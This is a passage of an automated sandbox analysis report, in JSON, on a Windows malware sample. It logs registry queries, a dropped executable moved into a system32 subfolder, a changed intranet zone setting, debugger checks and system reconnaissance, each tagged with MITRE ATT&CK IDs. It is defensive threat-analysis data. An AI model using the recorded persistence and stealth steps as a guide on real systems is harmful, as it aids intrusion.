\"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\INPROCSERVER32\"; Key: \"\"; Value: \"\")\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\COM3\"; Key: \"\"; Value: \"\")\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\"; Key: \"\"; Value: \"\")\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\"; Key: \"\"; Value: \"\")\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\TREATAS\"; Key: \"\"; Value: \"\")\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\TREATAS\"; Key: \"\"; Value: \"\")\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\PROGID\"; Key: \"\"; Value: \"\")\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\PROGID\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-12", "type": 6, "relevance": 4, "name": "Monitors specific registry key for changes", "description": "\"netsh.exe\" monitors \"HKLM\\SYSTEM\\ControlSet001\\Control\\NetworkProvider\\HwOrder\" (Filter: 4; Subtree: 0)\n \"netsh.exe\" monitors \"HKLM\\SYSTEM\\ControlSet001\\services\\WinSock2\\Parameters\\Protocol_Catalog9\" (Filter: 1; Subtree: 0)\n \"netsh.exe\" monitors \"HKLM\\SYSTEM\\ControlSet001\\services\\WinSock2\\Parameters\\NameSpace_Catalog5\" (Filter: 1; Subtree: 0)\n \"netsh.exe\" monitors \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\" (Filter: 5; Subtree: 1)\n \"svchost.exe\" monitors \"\\REGISTRY\\USER\\.DEFAULT\\Control Panel\\International\" (Filter: 4; Subtree: 1)\n \"svchost.exe\" monitors \"HKLM\\SYSTEM\\ControlSet001\\services\\WinSock2\\Parameters\\Protocol_Catalog9\" (Filter: 1; Subtree: 0)\n \"svchost.exe\" monitors \"HKLM\\SYSTEM\\ControlSet001\\services\\WinSock2\\Parameters\\NameSpace_Catalog5\" (Filter: 1; Subtree: 0)", "origin": "API Call", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" trying to touch file \"C:\\dbghelp.dll\"\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" trying to touch file \"C:\\Windows\\system32\\dbghelp.dll\"\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" trying to touch file \"C:\\msvcr100.dll\"\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" trying to touch file \"C:\\Windows\\system32\\msvcr100.dll\"\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" trying to touch file \"pipe\\uqyipjlp\"\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" trying to touch file \"C:\\\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" trying to access non-existent file \"pipe\\uqyipjlp\"\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" trying to access non-existent file \"C:\\8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe.Local\\\"\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" trying to access non-existent file \"C:\\Windows\\System32\\cmd.exe:Zone.Identifier\"\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" trying to access non-existent file \"C:\\Windows\\System32\\sc.exe:Zone.Identifier\"\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" trying to access non-existent file \"C:\\Windows\\System32\\netsh.exe:Zone.Identifier\"\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" trying to access non-existent file \"C:\\8A0CABF213753B71E35186FF3F3472C1A333433B6DB9B0D9E7F946FAEF3E1970.EXE.LOCAL\"\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" trying to access non-existent file \"C:\\Windows\\System32\\cmd.exe:ZONE.IDENTIFIER\"\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" trying to access non-existent file \"C:\\Windows\\System32\\sc.exe:ZONE.IDENTIFIER\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\temp\\mojpivf.exe\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"mojpivf.exe.67EE4A81.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"mojpivf.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%TEMP%\\mojpivf.exe]- [targetUID: 00000000-00005856]\n \"dism.log\" has type \"Unicode text UTF-8 (with BOM) text with very long lines (312) with CRLF line terminators\"- [targetUID: N/A]\n \"DISMHOST.EXE.67EE4FF1.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"MOJPIVF.EXE.67EE4A82.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"mojpivf.exe.67EE4A81.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"mojpivf.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%TEMP%\\mojpivf.exe]- [targetUID: 00000000-00005856]\n \"DISMHOST.EXE.67EE4FF1.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"MOJPIVF.EXE.67EE4A82.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-16", "type": 6, "relevance": 1, "name": "Connects to LPC ports", "description": "\"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" connecting to \"\\ThemeApiPort\"\n \"netsh.exe\" connecting to \"\\ThemeApiPort\"", "origin": "API Call", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Caches\"\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" touched file \"%LOCALAPPDATA%\\Microsoft\\Windows\\Caches\"\n \"svchost.exe\" touched file \"C:\\Windows\\system32\\config\\systemprofile:.repos\"\n \"svchost.exe\" touched file \"C:\\Windows\\system32\\config\\systemprofile\\Local Settings:.repos\"\n \"svchost.exe\" touched file \"C:\\Windows\\TEMP\\wincookie.repos\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\"; Key: \"SUPPRESSIONPOLICY\"; Value: \"\")\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{04731B67-D933-450A-90E6-4ACD2E9408FE}\"; Key: \"SUPPRESSIONPOLICY\"; Value: \"\")\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\"; Key: \"SUPPRESSIONPOLICY\"; Value: \"\")\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{11016101-E366-4D22-BC06-4ADA335C892B}\"; Key: \"SUPPRESSIONPOLICY\"; Value: \"\")\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\"; Key: \"SUPPRESSIONPOLICY\"; Value: \"\")\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\INPROCSERVER32\"; Key: \"\"; Value: \"\")\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\INPROCSERVER32\"; Key: \"LOADWITHOUTCOM\"; Value: \"\")\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\COM3\"; Key: \"COM+ENABLED\"; Value: \"\")\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\"; Key: \"\"; Value: \"\")\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\INPROCSERVER32\"; Key: \"INPROCSERVER32\"; Value: \"\")\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\INPROCSERVER32\"; Key: \"THREADINGMODEL\"; Value: \"\")\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"MAXSXSHASHCOUNT\"; Value: \"\")\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\INTERNET EXPLORER\\EUPP PROTECTED - IT IS A VIOLATION OF WINDOWS POLICY TO MODIFY. SEE AKA.MS/BROWSERPOLICY\"; Key: \"FIRSTRUNCOMPLETE\"; Value: \"\")\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\DATACOLLECTION\"; Key: \"COMMERCIALDATAOPTIN\"; Value: \"\")\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"PREFEREXTERNALMANIFEST\"; Value: \"\")\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"CREATEURICACHESIZE\"; Value: \"\")\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"CREATEURICACHESIZE\"; Value: \"\")\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"CREATEURICACHESIZE\"; Value: \"\")\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"CREATEURICACHESIZE\"; Value: \"\")\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"ENABLEPUNYCODE\"; Value: \"\")\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"ENABLEPUNYCODE\"; Value: \"\")\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"ENABLEPUNYCODE\"; Value: \"\")\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"SECURITY_HKLM_ONLY\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-162", "type": 6, "relevance": 1, "name": "Renames files", "description": "\"cmd.exe\" renamed original file\"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\mojpivf.exe\" to \"%WINDIR%\\system32\\tpxhoiko\\mojpivf.exe\"", "origin": "API Call", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-9", "type": 6, "relevance": 4, "name": "Queries process information", "description": "\"netsh.exe\" queried SystemProcessInformation at 00000000-00003048-00000105-291923 [PID: 3048]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00003048-00000105-599136 [PID: 3048]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00003048-00000105-1209334 [PID: 3048]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00003048-00000105-1858014 [PID: 3048]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00003048-00000105-2245293 [PID: 3048]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00003048-00000105-2436486 [PID: 3048]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00003048-00000105-3221615 [PID: 3048]\n \"svchost.exe\" queried SystemProcessInformation at 00000000-00005992-00000105-103154 [PID: 5992]", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "registry-179", "type": 3, "relevance": 1, "name": "Tries to map intranet network resources to internet zone", "description": "\"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"UNCASINTRANET\"; Value: \"00000000\")", "origin": "Registry Access", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "module-16", "type": 10, "relevance": 3, "name": "Loads the debugger/analysis tool module", "description": "\"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" loaded module \"%WINDIR%\\System32\\dbghelp.dll\" at 6ECF0000\n \"mojpivf.exe\" loaded module \"%WINDIR%\\System32\\dbghelp.dll\" at 6ECF0000\n \"svchost.exe\" loaded module \"%WINDIR%\\System32\\dbghelp.dll\" at 6ECF0000", "origin": "Loaded Module", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-10", "type": 6, "relevance": 6, "name": "Queries kernel debugger information", "description": "\"netsh.exe\" at 00000000-00003048-00000105-5000142", "origin": "API Call", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-39", "type": 6, "relevance": 8, "name": "Queries volume information of an entire harddrive", "description": "\"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" queries volume information of \"C:\\\" at 00000000-00005796-0000010C-1266405\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" queries volume information of \"C:\\\" at 00000000-00005796-0000010C-1267610\n \"mojpivf.exe\" queries volume information of \"C:\\\" at 00000000-00002772-0000010C-2039747\n \"mojpivf.exe\" queries volume information of \"C:\\\" at 00000000-00002772-0000010C-2047243\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00005992-0000010C-74890\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00005992-0000010C-979306\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00005992-0000010C-2163817\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00005992-0000010C-2165356", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001c5ca9774379ab75ffffffff0c0000004c62a9771f79ab75ffffffff0c00000064ec120004000000000400000100000078ec12000a0e150000000000 (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031006a0600000088ea8677ecf91200b344a06a88000000000000000000000000000000000000000000000000000000880000000000000000000000000000002c6b40001801aebebcf51200616b400088000000f822410081a88677ecf9120000009001004ec600000200000800000087335d00 (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb4376003e2d000040fd7f9a5cab7700e0fd7fb0c960014440fd7f00000000400000003f000000250000000040fd7fa4c96001c15cab776082b277250000000040fd7f9a5cab7700e0fd7fc8c960015789aa778083b2771317ac75d8eb4376 (UID: 00000000-00005796)\n \"sc.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000078e41e00e82f1b006418000074f53c00d4f63c0001000000d0201e000100000088f53c00935cab774083b277d4a0aa77d6a48177d4f63c000100000001000000d0ef1d000000000058f53c0088f53c00f4f53c0095e1a677a6551700feffffffd4a0aa771bbeab750000bf7700000000 (UID: 00000000-00006016)\n \"mojpivf.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310000d8ae2000b8fc3d00145caa77435caa7784fd3d000100000094011e000100000038fc3d00935cab774083b277d4a0aa770da6807784fd3d00010000000100000008ec20000000000008fc3d0038fc3d00a4fc3d0095e1a677cd5e1700feffffffd4a0aa771bbeab750000bf7700000000 (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001c5ca9774379ab75ffffffff0c0000004c62a9771f79ab75ffffffff0c00000064ec120004000000000400000100000078ec12000a0e2e0000000000 (UID: 00000000-00002772)\n \"netsh.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00003048)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-225", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve the host name of a computer", "description": "\"svchost.exe\" called \"gethostname\" with parameter %OSUSER%-PC & 128 (UID: 00000000-00005992)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-11", "type": 6, "relevance": 2, "name": "Queries volume information", "description": "\"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" queries volume information of \"C:\\\" at 00000000-00005796-0000010C-1266405\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" queries volume information of \"C:\\\" at 00000000-00005796-0000010C-1267610\n \"mojpivf.exe\" queries volume information of \"C:\\\" at 00000000-00002772-0000010C-2039747\n \"mojpivf.exe\" queries volume information of \"C:\\\" at 00000000-00002772-0000010C-2047243\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00005992-0000010C-74890\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00005992-0000010C-979306\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00005992-0000010C-2163817\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00005992-0000010C-2165356", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"RtlGetVersion\" with parameter 